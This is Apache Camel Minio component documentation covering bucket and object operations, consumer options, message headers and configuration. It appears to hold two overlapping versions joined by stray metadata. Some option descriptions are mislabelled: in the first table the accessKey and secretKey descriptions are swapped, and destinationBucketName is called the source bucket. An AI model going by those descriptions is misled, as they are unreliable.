\n\n- ListBuckets: this operation lists the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account.\n\n- DeleteBucket: this operation deletes the bucket specified as a URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket.\n\n- ListObjects: this operation lists the objects in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket.\n\n- GetObject: this operation gets a single object from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a MinioObject instance related to the camelKey object in the mycamelbucket bucket.\n\n- GetObjectRange: this operation gets a single object range from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.OFFSET, \"0\");\n exchange.getIn().setHeader(MinioConstants.LENGTH, \"9\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a MinioObject instance related to the camelKey object in the mycamelbucket bucket, containing the bytes from 0 to 9.
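\n\nWhen no `operation` is set, the producer defaults to uploading the message body. A minimal sketch of an upload (the bucket and key names are placeholder assumptions):\n\n[source,java]\n--------------------------------------------------------------------------------\n \/\/ Hypothetical upload route: the default producer operation stores the body\n \/\/ under the key given in the CamelMinioObjectName header.\n from(\"direct:start\")\n .setHeader(MinioConstants.OBJECT_NAME, constant(\"camelKey\"))\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------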
\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users can enable or disable the automatic creation of a Minio bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false, any operation on a non-existent bucket in Minio won't be successful, and an error will be returned.\n\n== Automatic detection of Minio client in registry\n\nThe component is capable of detecting the presence of a Minio bean in the registry.\nIf it's the only instance of that type, it will be used as the client, and you won't have to define it as a URI parameter, as in the example above.\nThis can be really useful for smarter configuration of the endpoint.\n\n== Moving objects between buckets\n\nSome users like to consume objects from one bucket and move the content to a different one without using the copyObject feature of this component.\nIf this is the case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer; otherwise the file will always be overwritten in the same\noriginal bucket.
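\n\nA minimal sketch of that pattern (the bucket names are placeholder assumptions): dropping the `CamelMinioBucketName` header before sending, so the producer writes to the bucket named in the target URI instead:\n\n[source,java]\n--------------------------------------------------------------------------------\n \/\/ Hypothetical bucket-to-bucket route: remove the incoming bucket name header\n \/\/ so the object is written to mydestinationbucket, not back to the source.\n from(\"minio:\/\/mysourcebucket?minioClient=#minioClient\")\n .removeHeader(MinioConstants.BUCKET_NAME)\n .to(\"minio:\/\/mydestinationbucket?minioClient=#minioClient\");\n--------------------------------------------------------------------------------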
\n\n== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead, another option has been added: moveAfterRead. With this option enabled the consumed object will be moved to a target destination bucket instead of being only deleted.\nThis requires specifying the destinationBucketName option. As an example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"minio:\/\/mycamelbucket?minioClient=#minioClient&moveAfterRead=true&destinationBucketName=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to the myothercamelbucket bucket and deleted from the original one (because deleteAfterRead is set to true by default).\n\n== Using a POJO as body\n\nSometimes building a Minio request can be complex because of multiple options. We introduce the possibility to use a POJO as the body.\nIn Minio there are multiple operations you can submit; as an example, for a ListObjects request you can do something like:\n\n[source,java]\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:minio\")\n .setBody(ListObjectsArgs.builder()\n .bucket(bucketName)\n .recursive(getConfiguration().isRecursive())\n .build())\n .to(\"minio:\/\/test?minioClient=#minioClient&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly, without the need to pass headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-minio<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$minio-starter.adoc[]","old_contents":"","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
| false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id() | | String\n| *secure* (common) | Flag to indicate to use secure connection to minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for source object while copy\/move objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypassGovernanceMode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Source bucket name. | | String\n| *destinationObjectName* (consumer) | Source object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to autocloseBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user meta data. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. 
| false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List recursively than directory structure emulation. | false | boolean\n| *startAfter* (consumer) | list objects in bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set un modified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | when true, version 1 of REST API is used. | false | boolean\n| *versionId* (consumer) | Set specific version_ID of a object when deleting the object. | | String\n| *deleteAfterWrite* (producer) | Delete file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. 
| true | boolean\n| *accessKey* (security) | Amazon AWS Secret Access Key or Minio Access Key. If not set camel will connect to service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Access Key Id or Minio Secret Key. If not set camel will connect to service for anonymous access. | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Minio endpoint is configured using URI syntax:\n\n----\nminio:bucketName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketName* | *Required* Bucket name | | String\n|===\n\n\n=== Query Parameters (64 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if bucket name not exist. | true | boolean\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | Endpoint can be an URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating new bucket. | false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id() | | String\n| *secure* (common) | Flag to indicate to use secure connection to minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for source object while copy\/move objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypassGovernanceMode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. 
Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Source bucket name. | | String\n| *destinationObjectName* (consumer) | Source object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to autocloseBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user meta data. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. | false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List recursively than directory structure emulation. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *startAfter* (consumer) | list objects in bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set un modified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | when true, version 1 of REST API is used. | false | boolean\n| *versionId* (consumer) | Set specific version_ID of a object when deleting the object. | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. 
By default the consumer will deal with exceptions, which will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling that usually occurs during the poll operation, before an Exchange has been created and routed in Camel. | | PollingConsumerPollStrategy\n| *deleteAfterWrite* (producer) | Delete the file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through the endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time. | false | boolean\n| *operation* (producer) | The operation to do in case the user doesn't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due to some error) that should happen before the backoffMultiplier should kick in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultiplier should kick in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer back off if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt happens again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. 
There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either the camel-spring or camel-quartz component. Use value spring or quartz for the built-in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz or Spring based schedulers. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in the JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key Id or Minio Access Key. If not set, Camel will connect to the service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Secret Access Key or Minio Secret Key. If not set, Camel will connect to the service for anonymous access. | | String\n|===\n\/\/ endpoint options: END\n\nRequired Minio component options\n\nYou have to provide the minioClient in the\nRegistry, or your accessKey and secretKey, to access\nhttps:\/\/min.io\/[Minio].\n
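For example, the keys can be passed directly as URI options (a minimal sketch; the endpoint URL and key values are illustrative placeholders, and RAW() is assumed here to keep special characters in the keys from being interpreted as URI syntax):\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Connect with explicit credentials instead of a registry client.\nfrom(\"minio:\/\/mycamelbucket?endpoint=https:\/\/localhost:9000\"\n        + \"&accessKey=RAW(minioAccessKey)&secretKey=RAW(minioSecretKey)\")\n    .to(\"mock:result\");\n--------------------------------------------------------------------------------\n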
== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you for instance to know how many messages exist in this\nbatch and for instance let the Aggregator\naggregate this number of messages.\n\n== Usage\n\n=== Message headers evaluated by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\"]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioBucketName` |`String` |The bucket name in which this object will be stored, or which will be used for the current operation\n\n|`CamelMinioDestinationBucketName` |`String` |The destination bucket name which will be used for the current operation\n\n|`CamelMinioContentLength` |`Long` |The content length of this object.\n\n|`CamelMinioContentType` |`String` |The content type of this object.\n\n|`CamelMinioContentControl` |`String` |The content control of this object.\n\n|`CamelMinioContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelMinioContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelMinioContentMD5` |`String` |The MD5 checksum of this object.\n\n|`CamelMinioDestinationObjectName` |`String` |The destination key which will be used for the current operation\n\n|`CamelMinioObjectName` |`String` |The key under which this object will be stored, or which will be used for the current operation\n\n|`CamelMinioLastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelMinioOperation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, deleteObjects, listBuckets, deleteBucket, downloadLink, listObjects\n\n|`CamelMinioStorageClass` |`String` |The storage class of this object.\n\n|`CamelMinioCannedAcl` |`String` |The canned ACL that will be applied to the object. See\n`com.amazonaws.services.s3.model.CannedAccessControlList` for allowed\nvalues.\n\n\/\/|`CamelMinioHeaders` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelMinioServerSideEncryption` |`String` |Sets the server-side encryption algorithm when encrypting\nthe object using Minio-managed keys. For example, use AES256.\n\n|`CamelMinioVersionId` |`String` |The version ID of the object to be stored or returned from the current operation\n|=======================================================================\n\n=== Message headers set by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelMinioETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelMinioVersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\/\/|`CamelMinioDownloadLinkExpiration` | `String` | The expiration (millis) of the URL download link. The link will be stored into the *CamelMinioDownloadLink* response header.\n\n|=======================================================================\n\n=== Message headers set by the Minio consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioObjectName` |`String` |The key under which this object is stored.\n\n|`CamelMinioBucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelMinioETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Minio.\n\n|`CamelMinioLastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Minio last recorded a modification to the associated object.\n\n|`CamelMinioVersionId` |`String` |The version ID of the associated Minio object if available. Version\nIDs are only assigned to objects when an object is uploaded to a Minio bucket that has object versioning enabled.\n\n|`CamelMinioContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelMinioContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. 
This data is used as a\nmessage integrity check to verify that the data received by Minio is\nthe same data that the caller sent.\n\n|`CamelMinioContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelMinioContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelMinioContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelMinioContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelMinioServerSideEncryption` |`String` |The server-side encryption algorithm when encrypting the\nobject using Minio-managed keys.\n|=======================================================================\n\n=== Minio Producer operations\n\nThe Camel-Minio component provides the following operations on the producer side:\n\n- copyObject\n- listObjects\n- deleteObject\n- deleteObjects\n- deleteBucket\n- listBuckets\n- getObject (this will return a MinioObject instance)\n- getObjectRange (this will return a MinioObject instance)\n\n=== Advanced Minio configuration\n\nIf your Camel application is running behind a firewall, or if you need to\nhave more control over the `MinioClient` instance configuration, you can\ncreate your own instance and refer to it in your Camel Minio component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/MyBucket?minioClient=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n
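A minimal sketch of how such a custom client could be created and bound, assuming the Minio Java SDK builder API and a `camelContext` in scope (the endpoint URL, credentials and the `client` bean name are illustrative assumptions):\n\n[source,java]\n--------------------------------------------------------------------------------\nimport io.minio.MinioClient;\n\n\/\/ Build a client with an explicit endpoint and credentials; proxy or\n\/\/ custom OkHttpClient settings could also be configured at this point.\nMinioClient client = MinioClient.builder()\n        .endpoint(\"https:\/\/play.min.io\")\n        .credentials(\"minioAccessKey\", \"minioSecretKey\")\n        .build();\n\n\/\/ Bind it in the Camel registry under the name used in the URI (#client).\ncamelContext.getRegistry().bind(\"client\", client);\n--------------------------------------------------------------------------------\n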
=== Minio Producer Operation examples\n\n- CopyObject: this operation copies an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.DESTINATION_BUCKET_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.DESTINATION_OBJECT_NAME, \"camelDestinationKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object camelKey from the bucket mycamelbucket to the camelDestinationBucket bucket, storing it under the name given in the camelDestinationKey header.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation lists the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account.\n\n- DeleteBucket: this operation deletes the bucket specified as a URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket.\n\n- ListObjects: this operation lists the objects in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket.\n\n- GetObject: this operation gets a single object from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a MinioObject instance related to the camelKey object in the mycamelbucket bucket.\n\n- GetObjectRange: this operation gets a single object range from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.OFFSET, \"0\");\n exchange.getIn().setHeader(MinioConstants.LENGTH, \"9\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a MinioObject instance related to the camelKey object in the mycamelbucket bucket, containing the bytes from 0 to 9.\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users can control the autocreation of a Minio bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false, any operation on a non-existent bucket in Minio won't be successful, and an error will be returned.\n
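For instance, a route could opt out of the autocreation explicitly (a sketch; the bucket and client bean names are placeholders):\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ With autoCreateBucket=false, consuming from a missing bucket fails\n\/\/ with an error instead of silently creating the bucket.\nfrom(\"minio:\/\/mycamelbucket?minioClient=#minioClient&autoCreateBucket=false\")\n    .to(\"mock:result\");\n--------------------------------------------------------------------------------\n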
== Automatic detection of Minio client in registry\n\nThe component is capable of detecting the presence of a Minio client bean in the registry.\nIf it's the only instance of that type, it will be used as the client, and you won't have to define it as a URI parameter, as in the example above.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Moving objects from one bucket to another\n\nSome users like to consume objects from a bucket and move the content to a different one without using the copyObject feature of this component.\nIf this is the case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer, otherwise the file will always be overwritten in the same\noriginal bucket.\n
